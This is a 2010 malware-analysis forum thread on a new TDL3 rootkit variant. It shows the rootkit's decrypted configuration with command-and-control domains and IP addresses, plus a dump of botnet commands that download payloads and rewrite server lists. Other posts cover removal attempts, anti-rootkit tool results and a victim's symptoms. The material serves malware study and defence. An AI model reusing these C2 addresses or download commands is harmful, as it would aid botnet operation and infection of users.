A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #618  by EP_X0FF
 Sat Apr 10, 2010 2:42 am
This is new version of TDL3. It is now infecting random drivers at drop time.
[main]
quote=I felt like putting a bullet between the eyes of every panda that wouldn't screw to save it's species. I wanted to open the dump valves on oil tankers and smother all those french beaches I'd never see. I wanted to breathe smoke
version=3.273
installdate=10.4.2010 2:40:36
builddate=6.4.2010 9:53:18
[injector]
*=tdlcmd.dll
[tdlcmd]
servers=https://zz87jhfda88.com/;https://91.212 ... n4cx00.cc/
wspservers=http://30xc1cjh91.com/;http://j00k877x. ... 3kjf7.com/
popupservers=http://clkh71yhks66.com/
version=3.741
delay=7200
clkservers=http://mfdclk001.org/
[tasks]
tdlcmd.dll=hxxps://112.121.181.26/rDbtafVZlDjA
 #619  by EP_X0FF
 Sat Apr 10, 2010 3:07 am
gjf wrote:And it will work if rootkit doesn't checks it's registry settings. So this solution will be completely destroyed in several strings of code by rootkit author :)
This is cat-mouse game :) A little addition in loader blinded all these removers.

some fun from the inside ;)
botnetcmd.SetCmdDelay(14400).
botnetcmd.FileDownloadRandom('https://zz87jhfda88.com/7sQnjvEo1qS0h12 ... botnet.dat').
tdlcmd.Download('https://91.212.226.66/4MwsS9PAz2x+','tdlcmd.dll').
tdlcmd.ConfigWrite('tdlcmd','delay','7200').
tdlcmd.ConfigWrite('tdlcmd','servers','https://zz87jhfda88.com/;https://19js81 ... n4cx00.cc/').
tdlcmd.ConfigWrite('tdlcmd','wspservers','http://30xc1cjh91.com/;http://j00k877x. ... 3kjf7.com/').
tdlcmd.ConfigWrite('tdlcmd','popupservers','http://clkh71yhks66.com/').
tdlcmd.ConfigWrite('tdlcmd','clkservers','http://z0g7ya1i0.com/').
\\?\globalroot\xkcxvrtm\tbcbopin\keywords
 #625  by InsaneKaos
 Sat Apr 10, 2010 2:23 pm
The trick with the registrykey change won't work, TDL will set it back. If you have no clean copy of a driver, you can use the driver from System32\Drivers, because TDL will copy the clean driver, even it is infected, remember, TDL won't let you know that the drivers is infected while it is active, the clean copy or a part of it is saved to the last sektors and TDL will point at this clean driver if a program ask for information. Just copy the driver to C:\ or wherever you wan't to get a clean copy.

Greetings, Kaos
 #627  by EP_X0FF
 Sat Apr 10, 2010 2:43 pm
InsaneKaos wrote:The trick with the registrykey change won't work, TDL will set it back.
I've tried all new samples posted here. They don't care about registry as far as I see. However as gjf said, it is question of small driver fix in any new rootkit update.
 #632  by Blitskrieg
 Sat Apr 10, 2010 6:59 pm
EP_X0FF wrote:
InsaneKaos wrote:The trick with the registrykey change won't work, TDL will set it back.
I've tried all new samples posted here. They don't care about registry as far as I see. However as gjf said, it is question of small driver fix in any new rootkit update.
Now TDL changes ImagePath on shutdown.
 #634  by gjf
 Sun Apr 11, 2010 12:16 am
I have performed a test of different antirootkits for new sample. Files did not scanned, for VBA32 Antirootkit the driver was not installed, RkU was as newest as possible. Kernel Detective 1.3.1. and RootRepeal were used too but gave nothing.

So logs are attached.

Who is the best:
1. Gmer - sees "entry point in ".rsrc" section" and "suspicious modification".
2. RkU (last beta) - "Virus alike driver modification".
3. VBA32 Antirootkit - "forged file".

So only these three can find patched driver. All other sucks.
Attachments
Logs of scanning
(31.34 KiB) Downloaded 61 times
 #656  by darseq
 Sun Apr 11, 2010 2:39 pm
Hi all. I got infected with tdl3 on the 6'th of april and just wanted to share some of the symptoms.

-ipnat.sys could not be loaded anymore causing windows firewall to fail. sc query ipnat returned
error code 2, could not find the file specified but navigating to the windows\system32\ipnat.sys
showed it was still there.

-Control panel | Administrative tools | Computer management | Disk management did not show
my hard-drive anymore.

-Hibernation failed: ftdisk event 45, The system could not successfully load the crash dump driver.

After two days of research I found tdl3 to be the problem. Gmer detected atapi.sys as suspicious,
nothing further though. TDSSkiller detected atapi.sys to be infected but could not fix it. tdss
remover (esage) found tcpip.sys to be infected which it could successfully restore. After this
all was cleaned (atapi.sys not suspicious anymore). The only remaining trace I could find was
a file KGyGaAvL.sys with hidden and system flags set. I am not really sure if it is part of tdl3
but its contents seems to be encrypted (I attached it in case someone is interested, password
is virus). I could not find any file called tdlcmd.dll, but maybe tdss remover deleted it.

I still have a question. Exactly what does tdl3 do once infected? How bad has my system been
compromised? Should I be changing all my passwords?
Attachments
this file was found in windows\system32
(2.11 KiB) Downloaded 64 times
  • 1
  • 6
  • 7
  • 8
  • 9
  • 10
  • 40